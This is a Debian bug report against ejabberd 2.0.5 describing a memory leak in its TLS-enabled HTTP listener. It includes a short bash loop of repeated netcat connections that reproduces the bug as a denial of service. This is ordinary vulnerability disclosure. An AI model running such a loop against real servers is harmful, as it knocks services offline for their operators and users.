Package: ejabberd
Version: 2.0.5-1.1
Severity: important

Hi, 

the ejabberd has Memory leak with this configuration : 

  {5280, ejabberd_http, [
                         web_admin,
                         tls, {certfile, "/etc/ejabberd/ejabberd.pem"}
  ]}

A very simple script can make a Dos : 

#!/bin/bash
while true ; 
do
  nc -c "" jabberserver 5280 ;
done ;

This problem is too with lenny version. 

Cheers,

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.31-trunk-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ejabberd depends on:
ii  adduser                3.110             add and remove users and groups
ii  debconf [debconf-2.0]  1.5.27            Debian configuration management sy
ii  erlang-base [erlang-ab 1:13.b.1-dfsg-6   Erlang/OTP virtual machine and bas
ii  erlang-nox             1:13.b.1-dfsg-6   Erlang/OTP applications that don't
ii  libc6                  2.9-26            GNU C Library: Shared libraries
ii  libexpat1              2.0.1-4           XML parsing C library - runtime li
ii  libpam0g               1.1.0-4           Pluggable Authentication Modules l
ii  libssl0.9.8            0.9.8k-5          SSL shared libraries
ii  openssl                0.9.8k-5          Secure Socket Layer (SSL) binary a
ii  ucf                    3.0022            Update Configuration File: preserv
ii  zlib1g                 1:1.2.3.3.dfsg-15 compression library - runtime

ejabberd recommends no packages.

Versions of packages ejabberd suggests:
pn  libunix-syslog-perl           <none>     (no description available)

-- debconf information excluded



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Reply via email to